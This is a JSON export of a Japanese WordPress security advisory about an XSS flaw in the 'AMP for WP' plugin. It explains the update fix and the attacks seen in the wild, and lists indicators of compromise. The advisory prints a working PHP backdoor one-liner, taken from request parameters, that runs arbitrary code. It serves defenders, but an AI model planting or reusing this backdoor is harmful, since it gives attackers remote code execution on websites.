{"id":1773,"date":"2019-10-24T13:52:12","date_gmt":"2019-10-24T04:52:12","guid":{"rendered":"https:\/\/wpmake.jp\/contents\/?post_type=security&#038;p=1773"},"modified":"2023-07-26T09:45:31","modified_gmt":"2023-07-26T00:45:31","slug":"news_20181121","status":"publish","type":"security","link":"https:\/\/wpmake.jp\/contents\/security\/news_20181121","title":{"rendered":"AMP for WP\u306e\u30d7\u30e9\u30b0\u30a4\u30f3\u306bXSS\u306e\u8106\u5f31\u6027\uff01\u6700\u65b0\u7248\u3078\u30a2\u30c3\u30d7\u30c7\u30fc\u30c8\u3092"},"content":{"rendered":"<p>\u65e5\u672c\u3067\u3082\u5229\u7528\u8005\u304c\u591a\u3044\u300cAMP for WP\u300d\u306bXSS\uff08\u30af\u30ed\u30b9\u30b5\u30a4\u30c8\u30b9\u30af\u30ea\u30d7\u30c6\u30a3\u30f3\u30b0\uff09\u306b\u5bfe\u3059\u308b\u8106\u5f31\u6027\u304c\u767a\u898b\u3055\u308c\u307e\u3057\u305f\u3002<br \/>\n\u5bfe\u5fdc\u65b9\u6cd5\u3068\u539f\u56e0\u3001\u4e3b\u306a\u653b\u6483\u65b9\u6cd5\u306b\u3064\u3044\u3066\u89e3\u8aac\u3057\u307e\u3059\u306e\u3067\u3001\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u4e2d\u306e\u65b9\u306f\u53c2\u8003\u306b\u3057\u3066\u3059\u3050\u306b\u5bfe\u5fdc\u3057\u3066\u304f\u3060\u3055\u3044\u3002<\/p>\n<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_71 counter-hierarchy ez-toc-counter ez-toc-custom ez-toc-container-direction\">\n<div class=\"ez-toc-title-container\">\n<p class=\"ez-toc-title\" style=\"cursor:inherit\">\u76ee\u6b21<\/p>\n<span class=\"ez-toc-title-toggle\"><a href=\"#\" class=\"ez-toc-pull-right ez-toc-btn ez-toc-btn-xs ez-toc-btn-default ez-toc-toggle\" aria-label=\"Toggle Table of Content\"><span class=\"ez-toc-js-icon-con\"><span class=\"\"><span class=\"eztoc-hide\" style=\"display:none;\">Toggle<\/span><span class=\"ez-toc-icon-toggle-span\"><svg style=\"fill: #282828;color:#282828\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" class=\"list-377408\" width=\"20px\" height=\"20px\" viewBox=\"0 0 24 24\" fill=\"none\"><path d=\"M6 6H4v2h2V6zm14 0H8v2h12V6zM4 11h2v2H4v-2zm16 0H8v2h12v-2zM4 16h2v2H4v-2zm16 0H8v2h12v-2z\" fill=\"currentColor\"><\/path><\/svg><svg style=\"fill: #282828;color:#282828\" class=\"arrow-unsorted-368013\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"10px\" height=\"10px\" viewBox=\"0 0 24 24\" version=\"1.2\" baseProfile=\"tiny\"><path d=\"M18.2 9.3l-6.2-6.3-6.2 6.3c-.2.2-.3.4-.3.7s.1.5.3.7c.2.2.4.3.7.3h11c.3 0 .5-.1.7-.3.2-.2.3-.5.3-.7s-.1-.5-.3-.7zM5.8 14.7l6.2 6.3 6.2-6.3c.2-.2.3-.5.3-.7s-.1-.5-.3-.7c-.2-.2-.4-.3-.7-.3h-11c-.3 0-.5.1-.7.3-.2.2-.3.5-.3.7s.1.5.3.7z\"\/><\/svg><\/span><\/span><\/span><\/a><\/span><\/div>\n<nav><ul class='ez-toc-list ez-toc-list-level-1 ' ><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-1\" href=\"https:\/\/wpmake.jp\/contents\/security\/news_20181121\/#%E5%AF%BE%E5%BF%9C%E6%96%B9%E6%B3%95%E3%81%AB%E3%81%A4%E3%81%84%E3%81%A6\" title=\"\u5bfe\u5fdc\u65b9\u6cd5\u306b\u3064\u3044\u3066\">\u5bfe\u5fdc\u65b9\u6cd5\u306b\u3064\u3044\u3066<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-2\" href=\"https:\/\/wpmake.jp\/contents\/security\/news_20181121\/#XSS%EF%BC%88%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%EF%BC%89%E3%81%A8%E3%81%AF%EF%BC%9F\" title=\"XSS\uff08\u30af\u30ed\u30b9\u30b5\u30a4\u30c8\u30b9\u30af\u30ea\u30d7\u30c6\u30a3\u30f3\u30b0\uff09\u3068\u306f\uff1f\">XSS\uff08\u30af\u30ed\u30b9\u30b5\u30a4\u30c8\u30b9\u30af\u30ea\u30d7\u30c6\u30a3\u30f3\u30b0\uff09\u3068\u306f\uff1f<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-3\" href=\"https:\/\/wpmake.jp\/contents\/security\/news_20181121\/#%E3%80%8CAMP_for_WP%E3%80%8D%E3%83%97%E3%83%A9%E3%82%B0%E3%82%A4%E3%83%B3%E3%81%A7%E7%99%BA%E8%A6%8B%E3%81%95%E3%82%8C%E3%81%9F%E8%84%86%E5%BC%B1%E6%80%A7\" title=\"\u300cAMP for WP\u300d\u30d7\u30e9\u30b0\u30a4\u30f3\u3067\u767a\u898b\u3055\u308c\u305f\u8106\u5f31\u6027\">\u300cAMP for WP\u300d\u30d7\u30e9\u30b0\u30a4\u30f3\u3067\u767a\u898b\u3055\u308c\u305f\u8106\u5f31\u6027<\/a><ul class='ez-toc-list-level-3' ><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-4\" href=\"https:\/\/wpmake.jp\/contents\/security\/news_20181121\/#%E4%B8%8D%E6%AD%A3%E3%81%AA%E3%83%A6%E3%83%BC%E3%82%B6%E3%83%BC%E3%82%A2%E3%82%AB%E3%82%A6%E3%83%B3%E3%83%88%E3%81%8C%E4%BD%9C%E6%88%90%E3%81%95%E3%82%8C%E3%82%8B\" title=\"\u4e0d\u6b63\u306a\u30e6\u30fc\u30b6\u30fc\u30a2\u30ab\u30a6\u30f3\u30c8\u304c\u4f5c\u6210\u3055\u308c\u308b\">\u4e0d\u6b63\u306a\u30e6\u30fc\u30b6\u30fc\u30a2\u30ab\u30a6\u30f3\u30c8\u304c\u4f5c\u6210\u3055\u308c\u308b<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-5\" href=\"https:\/\/wpmake.jp\/contents\/security\/news_20181121\/#%E5%88%A5%E3%81%AE%E3%83%97%E3%83%A9%E3%82%B0%E3%82%A4%E3%83%B3%E3%81%AB%E5%AF%BE%E3%81%99%E3%82%8B%E3%83%90%E3%83%83%E3%82%AF%E3%83%89%E3%82%A2%E3%82%B3%E3%83%BC%E3%83%89%E3%81%AE%E6%8C%BF%E5%85%A5\" title=\"\u5225\u306e\u30d7\u30e9\u30b0\u30a4\u30f3\u306b\u5bfe\u3059\u308b\u30d0\u30c3\u30af\u30c9\u30a2\u30b3\u30fc\u30c9\u306e\u633f\u5165\">\u5225\u306e\u30d7\u30e9\u30b0\u30a4\u30f3\u306b\u5bfe\u3059\u308b\u30d0\u30c3\u30af\u30c9\u30a2\u30b3\u30fc\u30c9\u306e\u633f\u5165<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-6\" href=\"https:\/\/wpmake.jp\/contents\/security\/news_20181121\/#%E4%BE%B5%E5%85%A5%E3%81%AE%E7%97%95%E8%B7%A1%EF%BC%88IOC%EF%BC%89\" title=\"\u4fb5\u5165\u306e\u75d5\u8de1\uff08IOC\uff09\">\u4fb5\u5165\u306e\u75d5\u8de1\uff08IOC\uff09<\/a><ul class='ez-toc-list-level-3' ><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-7\" href=\"https:\/\/wpmake.jp\/contents\/security\/news_20181121\/#%E4%B8%80%E8%88%AC%E7%9A%84%E3%81%AA%E6%94%BB%E6%92%83%E8%80%85%E3%81%AEIP\" title=\"\u4e00\u822c\u7684\u306a\u653b\u6483\u8005\u306eIP\">\u4e00\u822c\u7684\u306a\u653b\u6483\u8005\u306eIP<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-8\" href=\"https:\/\/wpmake.jp\/contents\/security\/news_20181121\/#%E3%82%A2%E3%82%AF%E3%82%BB%E3%82%B9%E3%81%95%E3%82%8C%E3%81%9F%E9%80%81%E4%BF%A1%E3%83%89%E3%83%A1%E3%82%A4%E3%83%B3\" title=\"\u30a2\u30af\u30bb\u30b9\u3055\u308c\u305f\u9001\u4fe1\u30c9\u30e1\u30a4\u30f3\">\u30a2\u30af\u30bb\u30b9\u3055\u308c\u305f\u9001\u4fe1\u30c9\u30e1\u30a4\u30f3<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-9\" href=\"https:\/\/wpmake.jp\/contents\/security\/news_20181121\/#%E6%94%BB%E6%92%83%E8%80%85%E3%81%AE%E3%83%A6%E3%83%BC%E3%82%B6%E3%83%BC%E3%82%A8%E3%83%BC%E3%82%B8%E3%82%A7%E3%83%B3%E3%83%88\" title=\"\u653b\u6483\u8005\u306e\u30e6\u30fc\u30b6\u30fc\u30a8\u30fc\u30b8\u30a7\u30f3\u30c8\">\u653b\u6483\u8005\u306e\u30e6\u30fc\u30b6\u30fc\u30a8\u30fc\u30b8\u30a7\u30f3\u30c8<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-10\" href=\"https:\/\/wpmake.jp\/contents\/security\/news_20181121\/#%E3%83%87%E3%83%BC%E3%82%BF%E3%83%99%E3%83%BC%E3%82%B9%E3%82%A4%E3%83%B3%E3%82%B8%E3%82%B1%E3%83%BC%E3%82%BF%E3%83%BC\" title=\"\u30c7\u30fc\u30bf\u30d9\u30fc\u30b9\u30a4\u30f3\u30b8\u30b1\u30fc\u30bf\u30fc\">\u30c7\u30fc\u30bf\u30d9\u30fc\u30b9\u30a4\u30f3\u30b8\u30b1\u30fc\u30bf\u30fc<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-11\" href=\"https:\/\/wpmake.jp\/contents\/security\/news_20181121\/#%E3%81%BE%E3%81%A8%E3%82%81\" title=\"\u307e\u3068\u3081\">\u307e\u3068\u3081<\/a><\/li><\/ul><\/nav><\/div>\n<h2><span class=\"ez-toc-section\" id=\"%E5%AF%BE%E5%BF%9C%E6%96%B9%E6%B3%95%E3%81%AB%E3%81%A4%E3%81%84%E3%81%A6\"><\/span>\u5bfe\u5fdc\u65b9\u6cd5\u306b\u3064\u3044\u3066<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>\u300cAMP for WP\u300d\u30d7\u30e9\u30b0\u30a4\u30f3\u306e\u6700\u65b0\u30d0\u30fc\u30b8\u30e7\u30f3\uff08\u57f7\u7b46\u6642\u70b9\u3067\u306f<a href=\"https:\/\/wordpress.org\/plugins\/accelerated-mobile-pages\/\" rel=\"nofollow noopener\" target=\"_blank\">\u30d0\u30fc\u30b8\u30e7\u30f30.9.97.20<\/a>\uff09\u306b\u30a2\u30c3\u30d7\u30c7\u30fc\u30c8\u3057\u3066\u304f\u3060\u3055\u3044\u3002<\/p>\n<p>\u3082\u3057\u3001\u30b5\u30a4\u30c8\u3092\u78ba\u8a8d\u3057\u3066\u3059\u3067\u306b\u4e0d\u6b63\u306a\u30b9\u30af\u30ea\u30d7\u30c8\u304c\u57cb\u3081\u8fbc\u307e\u308c\u3066\u3044\u308b\u5834\u5408\u306f\u3001<a href=\"https:\/\/wpmake.jp\/contents\/knowledge\/security\/restoration\/\">\u3053\u3061\u3089<\/a>\u306a\u3069\u3092\u53c2\u8003\u306b\u3001\u4e0d\u6b63\u306a\u30b9\u30af\u30ea\u30d7\u30c8\u3092\u524a\u9664\u3057\u3066\u304f\u3060\u3055\u3044\u3002\u3054\u81ea\u8eab\u3067\u306e\u30b5\u30a4\u30c8\u5fa9\u65e7\u304c\u96e3\u3057\u3044\u5834\u5408\u306b\u306f\u3001<a href=\"https:\/\/wpmake.jp\/support-lp\/\">\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u5bfe\u7b56\u306e\u5c02\u9580\u5bb6<\/a>\u306b\u76f8\u8ac7\u3057\u307e\u3057\u3087\u3046\u3002<\/p>\n<p>\u4ee5\u4e0b\u3067\u306f\u3001\u4eca\u56de\u767a\u898b\u3055\u308c\u305f\u8106\u5f31\u6027\u306e\u60c5\u5831\u306b\u3064\u3044\u3066\u89e3\u8aac\u3057\u3066\u3044\u307e\u3059\u3002<br \/>\n\u30a8\u30f3\u30b8\u30cb\u30a2\u5411\u3051\u306e\u5185\u5bb9\u3082\u542b\u307e\u308c\u307e\u3059\u306e\u3067\u3001\u3054\u4e86\u627f\u304f\u3060\u3055\u3044\u3002<\/p>\n<h2><span class=\"ez-toc-section\" id=\"XSS%EF%BC%88%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%EF%BC%89%E3%81%A8%E3%81%AF%EF%BC%9F\"><\/span>XSS\uff08\u30af\u30ed\u30b9\u30b5\u30a4\u30c8\u30b9\u30af\u30ea\u30d7\u30c6\u30a3\u30f3\u30b0\uff09\u3068\u306f\uff1f<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>XSS\uff08\u30af\u30ed\u30b9\u30b5\u30a4\u30c8\u30b9\u30af\u30ea\u30d7\u30c6\u30a3\u30f3\u30b0\uff09\u3068\u306f\u3001\u30e6\u30fc\u30b6\u30fc\u306e\u30ea\u30af\u30a8\u30b9\u30c8\u306b\u5fdc\u3058\u3066\u30da\u30fc\u30b8\u306e\u8868\u793a\u5185\u5bb9\u3092\u751f\u6210\u3059\u308b\u52d5\u7684\u30da\u30fc\u30b8\u306b\u5bfe\u3059\u308b\u653b\u6483\u65b9\u6cd5\u306e\u3053\u3068\u3067\u3059\u3002\u52d5\u7684\u30da\u30fc\u30b8\u304c\u751f\u6210\u3055\u308c\u308b\u969b\u306e\u51e6\u7406\u306b\u3001\u7279\u5b9a\u306e\u60aa\u610f\u3042\u308b\u30b9\u30af\u30ea\u30d7\u30c8\u3092\u57cb\u3081\u8fbc\u307f\u3001\u30e6\u30fc\u30b6\u30fc\u5074\u3067\u305d\u306e\u30d7\u30ed\u30b0\u30e9\u30e0\u3092\u5b9f\u884c\u3055\u305b\u308b\u3053\u3068\u304c\u53ef\u80fd\u3067\u3059\u3002<\/p>\n<p>\u5177\u4f53\u7684\u306a\u88ab\u5bb3\u3068\u3057\u3066\u306f\u3001\u30bb\u30c3\u30b7\u30e7\u30f3\u30cf\u30a4\u30b8\u30e3\u30c3\u30af\u3084\u30d5\u30a9\u30fc\u30e0\u306e\u5165\u529b\u60c5\u5831\u306e\u53ce\u96c6\u3001\u60aa\u610f\u306e\u3042\u308b\u30b5\u30a4\u30c8\u3078\u306e\u8a98\u5c0e\u306a\u3069\u3067\u3059\u3002<\/p>\n<p>\u53c2\u8003\uff1a<a href=\"https:\/\/www.trendmicro.com\/ja_jp\/security-intelligence\/research-reports\/threat-solution\/xss.html\" rel=\"nofollow noopener\" target=\"_blank\">XSS\u3068\u306f\uff1f<\/a>\uff08\u5916\u90e8\u30b5\u30a4\u30c8\u304c\u958b\u304d\u307e\u3059\uff09<\/p>\n<h2><span class=\"ez-toc-section\" id=\"%E3%80%8CAMP_for_WP%E3%80%8D%E3%83%97%E3%83%A9%E3%82%B0%E3%82%A4%E3%83%B3%E3%81%A7%E7%99%BA%E8%A6%8B%E3%81%95%E3%82%8C%E3%81%9F%E8%84%86%E5%BC%B1%E6%80%A7\"><\/span>\u300cAMP for WP\u300d\u30d7\u30e9\u30b0\u30a4\u30f3\u3067\u767a\u898b\u3055\u308c\u305f\u8106\u5f31\u6027<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>\u4eca\u56de\u767a\u898b\u3055\u308c\u305f\u8106\u5f31\u6027\u306e\u8981\u70b9\u306f\u3001AJAX\u30d5\u30c3\u30af\u306b\u304a\u3051\u308b\u6a5f\u80fd\u30c1\u30a7\u30c3\u30af\u306e\u6b20\u5982\u3067\u3059\u3002<br \/>\n\u8106\u5f31\u6027\u306e\u898b\u3064\u304b\u3063\u305f\u30d0\u30fc\u30b8\u30e7\u30f3\u3067\u306f\u3001\u30e6\u30fc\u30b6\u30fc\u306f\u30e6\u30fc\u30b6\u30fc\u6a29\u9650\u306b\u95a2\u4fc2\u306a\u304f\u30ed\u30b0\u30a4\u30f3\u3092\u3057\u3066\u3044\u308b\u3060\u3051\u3067\u3001\u30d7\u30e9\u30b0\u30a4\u30f3\u306e\u6a5f\u80fd\u3092\u547c\u3073\u51fa\u3059\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002<br \/>\n\u305d\u306e\u305f\u3081\u3001\u7ba1\u7406\u8005\u6a29\u9650\u30e6\u30fc\u30b6\u30fc\u3067\u306a\u304f\u3068\u3082\u3001\u4f55\u3089\u304b\u306e\u6a29\u9650\u3092\u6301\u3064\u30e6\u30fc\u30b6\u30fc\u3067\u30ed\u30b0\u30a4\u30f3\u3059\u308b\u3060\u3051\u3067\u30cf\u30c3\u30ad\u30f3\u30b0\u3092\u884c\u3046\u3053\u3068\u304c\u53ef\u80fd\u3067\u3059\u3002<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E4%B8%8D%E6%AD%A3%E3%81%AA%E3%83%A6%E3%83%BC%E3%82%B6%E3%83%BC%E3%82%A2%E3%82%AB%E3%82%A6%E3%83%B3%E3%83%88%E3%81%8C%E4%BD%9C%E6%88%90%E3%81%95%E3%82%8C%E3%82%8B\"><\/span>\u4e0d\u6b63\u306a\u30e6\u30fc\u30b6\u30fc\u30a2\u30ab\u30a6\u30f3\u30c8\u304c\u4f5c\u6210\u3055\u308c\u308b<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>\u3053\u306e\u8106\u5f31\u6027\u3092\u5229\u7528\u3057\u305f\u653b\u6483\u3068\u3057\u3066\u78ba\u8a8d\u3055\u308c\u305f\u306e\u306f\u3001\u30ed\u30b0\u30a4\u30f3\u4e2d\u306e\u7ba1\u7406\u8005\u306e\u30bb\u30c3\u30b7\u30e7\u30f3\u3092\u5229\u7528\u3057\u3066\u4e0d\u6b63\u306a\u30e6\u30fc\u30b6\u30fc\u30a2\u30ab\u30a6\u30f3\u30c8\u304c\u4f5c\u6210\u3055\u308c\u308b\u3068\u3044\u3046\u3082\u306e\u3002<br \/>\n\t\u653b\u6483\u8005\u306f\u4e0b\u8a18\u306e\u3088\u3046\u306a\u30b3\u30fc\u30c9\u3092\u57cb\u3081\u8fbc\u307f\u307e\u3059\u3002<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/wpmake.jp\/contents\/wp-content\/uploads\/2018\/11\/amp-processnewuser.png\" alt=\"AMP for WP\u3092\u5229\u7528\u3057\u305f\u4e0d\u6b63\u306a\u30e6\u30fc\u30b6\u30fc\u30a2\u30ab\u30a6\u30f3\u30c8\u4f5c\u6210\u30b3\u30fc\u30c9\" width=\"452\" height=\"349\" class=\"aligncenter size-full wp-image-1075\" srcset=\"https:\/\/wpmake.jp\/contents\/wp-content\/uploads\/2018\/11\/amp-processnewuser.png 452w, https:\/\/wpmake.jp\/contents\/wp-content\/uploads\/2018\/11\/amp-processnewuser-300x232.png 300w, https:\/\/wpmake.jp\/contents\/wp-content\/uploads\/2018\/11\/amp-processnewuser-277x214.png 277w, https:\/\/wpmake.jp\/contents\/wp-content\/uploads\/2018\/11\/amp-processnewuser-282x218.png 282w\" sizes=\"(max-width: 452px) 100vw, 452px\" \/><\/p>\n<p>\u4e0a\u8a18\u306e\u30b3\u30fc\u30c9\u3067\u306f\u3001\u7ba1\u7406\u8005\u306e\u30d6\u30e9\u30a6\u30b6\u30bb\u30c3\u30b7\u30e7\u30f3\u304b\u3089processNewUser()\u6a5f\u80fd\u3092\u7528\u3044\u3066\u3001\u300csupportuuser\u300d\u3068\u3044\u3046\u65b0\u3057\u3044\u7ba1\u7406\u8005\u30a2\u30ab\u30a6\u30f3\u30c8\u3092\u767b\u9332\u3057\u3088\u3046\u3068\u3057\u3066\u3044\u307e\u3059\u3002<br \/>\n\t\u975e\u8868\u793a\u306eiframe\u3092\u4f5c\u6210\u3057\u3001\u305d\u306e\u4e2d\u3067\u65b0\u898f\u30e6\u30fc\u30b6\u30fc\u30d5\u30a9\u30fc\u30e0\u3092\u64cd\u4f5c\u3057\u3001\u6a29\u9650\u304b\u3089\u7ba1\u7406\u8005\u3092\u9078\u629e\u3057\u3066\u9001\u4fe1\u3059\u308b\u3068\u3044\u3046\u6d41\u308c\u3067\u3059\u3002<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E5%88%A5%E3%81%AE%E3%83%97%E3%83%A9%E3%82%B0%E3%82%A4%E3%83%B3%E3%81%AB%E5%AF%BE%E3%81%99%E3%82%8B%E3%83%90%E3%83%83%E3%82%AF%E3%83%89%E3%82%A2%E3%82%B3%E3%83%BC%E3%83%89%E3%81%AE%E6%8C%BF%E5%85%A5\"><\/span>\u5225\u306e\u30d7\u30e9\u30b0\u30a4\u30f3\u306b\u5bfe\u3059\u308b\u30d0\u30c3\u30af\u30c9\u30a2\u30b3\u30fc\u30c9\u306e\u633f\u5165<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>\u307e\u305f\u3001\u5225\u306e\u30d7\u30e9\u30b0\u30a4\u30f3\u306b\u5bfe\u3059\u308b\u30d0\u30c3\u30af\u30c9\u30a2\u30b3\u30fc\u30c9\u3092\u633f\u5165\u3057\u3088\u3046\u3068\u3057\u307e\u3059\u3002<br \/>\n\t\u5b9f\u969b\u306b\u306f\u4e0b\u8a18\u306e\u3088\u3046\u306aPHP\u30d0\u30c3\u30af\u30c9\u30a2\u304c\u78ba\u8a8d\u3055\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n<pre>@array_diff_ukey(@array((string)@$_REQUEST['vqmode']=>1), \r\n@array((string)stripslashes(@$_REQUEST['map'])=>2),@$_REQUEST['bootup']);\r\n\r\n@extract($_REQUEST);@die($cdate($adate));<\/pre>\n<p>\u4e0a\u8a18\u306e\u4e0d\u6b63\u306a\u30e6\u30fc\u30b6\u30fc\u30a2\u30ab\u30a6\u30f3\u30c8\u304c\u524a\u9664\u3055\u308c\u305f\u3068\u3057\u3066\u3082\u3001\u3053\u3046\u3057\u305f\u30d0\u30c3\u30af\u30c9\u30a2\u304c\u3042\u308b\u3053\u3068\u3067\u3001\u30cf\u30c3\u30ab\u30fc\u306f\u4efb\u610f\u306ePHP\u30b3\u30fc\u30c9\u3092\u5b9f\u884c\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002<\/p>\n<h2><span class=\"ez-toc-section\" id=\"%E4%BE%B5%E5%85%A5%E3%81%AE%E7%97%95%E8%B7%A1%EF%BC%88IOC%EF%BC%89\"><\/span>\u4fb5\u5165\u306e\u75d5\u8de1\uff08IOC\uff09<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>\u30cf\u30c3\u30ab\u30fc\u306b\u3088\u308b\u653b\u6483\u306e\u75d5\u8de1\u306b\u3064\u3044\u3066\u306f\u3001\u4ee5\u4e0b\u304c\u6307\u6a19\u3068\u306a\u308a\u307e\u3059\u3002<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E4%B8%80%E8%88%AC%E7%9A%84%E3%81%AA%E6%94%BB%E6%92%83%E8%80%85%E3%81%AEIP\"><\/span>\u4e00\u822c\u7684\u306a\u653b\u6483\u8005\u306eIP<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<ol>\n<li>181.215.147.23<\/li>\n<li>193.112.161.204<\/li>\n<li>219.145.170.23<\/li>\n<li>192.169.198.104<\/li>\n<li>193.112.65.16<\/li>\n<li>46.101.156.232<\/li>\n<li>193.112.91.155<\/li>\n<li>218.92.252.230<\/li>\n<li>208.109.53.224<\/li>\n<li>41.139.45.78<\/li>\n<\/ol>\n<h3><span class=\"ez-toc-section\" id=\"%E3%82%A2%E3%82%AF%E3%82%BB%E3%82%B9%E3%81%95%E3%82%8C%E3%81%9F%E9%80%81%E4%BF%A1%E3%83%89%E3%83%A1%E3%82%A4%E3%83%B3\"><\/span>\u30a2\u30af\u30bb\u30b9\u3055\u308c\u305f\u9001\u4fe1\u30c9\u30e1\u30a4\u30f3<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<ul>\n<li>sslapis.com<\/li>\n<\/ul>\n<h3><span class=\"ez-toc-section\" id=\"%E6%94%BB%E6%92%83%E8%80%85%E3%81%AE%E3%83%A6%E3%83%BC%E3%82%B6%E3%83%BC%E3%82%A8%E3%83%BC%E3%82%B8%E3%82%A7%E3%83%B3%E3%83%88\"><\/span>\u653b\u6483\u8005\u306e\u30e6\u30fc\u30b6\u30fc\u30a8\u30fc\u30b8\u30a7\u30f3\u30c8<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<ul>\n<li>Mozilla \/ 5.0\uff08Windows NT 6.1; Win64; x64; rv<\/li>\n<\/ul>\n<h3><span class=\"ez-toc-section\" id=\"%E3%83%87%E3%83%BC%E3%82%BF%E3%83%99%E3%83%BC%E3%82%B9%E3%82%A4%E3%83%B3%E3%82%B8%E3%82%B1%E3%83%BC%E3%82%BF%E3%83%BC\"><\/span>\u30c7\u30fc\u30bf\u30d9\u30fc\u30b9\u30a4\u30f3\u30b8\u30b1\u30fc\u30bf\u30fc<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<ul>\n<li>WordPress\u306e\u30c7\u30fc\u30bf\u30d9\u30fc\u30b9\u306e\u30e6\u30fc\u30b6\u30fc\u30c6\u30fc\u30d6\u30eb\u306b\u4e0d\u6b63\u306a\u30a2\u30ab\u30a6\u30f3\u30c8\u304c\u5b58\u5728\u3059\u308b<\/li>\n<li>option_name\u30d5\u30a3\u30fc\u30eb\u30c9\u306b\u6587\u5b57\u5217amp\u3092\u542b\u3080\u300cAMP For WP\u300d\u30d7\u30e9\u30b0\u30a4\u30f3\u306b\u95a2\u9023\u4ed8\u3051\u3089\u308c\u3066\u3044\u308bwp_options\u30a8\u30f3\u30c8\u30ea\u306b\u3001\u610f\u56f3\u3057\u306a\u3044JavaScript\u304c\u5b58\u5728\u3059\u308b\u3002<\/li>\n<\/ul>\n<h2><span class=\"ez-toc-section\" id=\"%E3%81%BE%E3%81%A8%E3%82%81\"><\/span>\u307e\u3068\u3081<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>\u4eca\u56de\u306e\u8106\u5f31\u6027\u306e\u767a\u898b\u3067\u3001XSS\u306e\u8106\u5f31\u6027\u5bfe\u7b56\u304c\u975e\u5e38\u306b\u91cd\u8981\u3067\u3042\u308b\u3053\u3068\u304c\u518d\u78ba\u8a8d\u3055\u308c\u307e\u3057\u305f\u3002<br \/>\n\u30cf\u30c3\u30ab\u30fc\u304c\u30b5\u30a4\u30c8\u306e\u7ba1\u7406\u8005\u306e\u30d6\u30e9\u30a6\u30b6\u3067\u4efb\u610f\u306eJavaScript\u3092\u5b9f\u884c\u3067\u304d\u308b\u5834\u5408\u3001\u305d\u3053\u304b\u3089\u69d8\u3005\u306a\u65b9\u6cd5\u3067\u30b5\u30a4\u30c8\u306b\u60aa\u610f\u306e\u3042\u308b\u30b9\u30af\u30ea\u30d7\u30c8\u3092\u4ed5\u639b\u3051\u3089\u308c\u307e\u3059\u3002<\/p>\n<p>\u6700\u5584\u306e\u9632\u885b\u7b56\u306f\u3001\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u5bfe\u7b56\u306e\u57fa\u672c\u3067\u3082\u3042\u308b\u30d7\u30e9\u30b0\u30a4\u30f3\u3092\u6700\u65b0\u306e\u72b6\u614b\u306b\u4fdd\u3064\u3068\u3044\u3046\u3053\u3068\u3067\u3059\u3002<br \/>\n\u300c<a href=\"https:\/\/wordpress.org\/plugins\/accelerated-mobile-pages\/\" rel=\"nofollow noopener\" target=\"_blank\">AMP for WP<\/a>\u300d\u30d7\u30e9\u30b0\u30a4\u30f3\u3092\u5c0e\u5165\u3057\u3066\u3044\u308b\u65b9\u306f\u3001\u518d\u5ea6\u30d0\u30fc\u30b8\u30e7\u30f3\u306e\u78ba\u8a8d\u3092\u884c\u3044\u307e\u3057\u3087\u3046\u3002\u6700\u65b0\u30d0\u30fc\u30b8\u30e7\u30f3\u306f2018\u5e7411\u670821\u65e5\u73fe\u5728\u3067\u300c\u30d0\u30fc\u30b8\u30e7\u30f30.9.97.20\u300d\u3067\u3059\u3002<\/p>\n<p>\u3082\u3057\u3001\u81ea\u5206\u306e\u30b5\u30a4\u30c8\u304c\u653b\u6483\u3092\u53d7\u3051\u305f\u53ef\u80fd\u6027\u304c\u3042\u308b\u3001\u4f55\u3089\u304b\u306e\u7406\u7531\u3067\u30d7\u30e9\u30b0\u30a4\u30f3\u306e\u66f4\u65b0\u304c\u3067\u304d\u306a\u3044\u5834\u5408\u306a\u3069\u306f\u3001<a 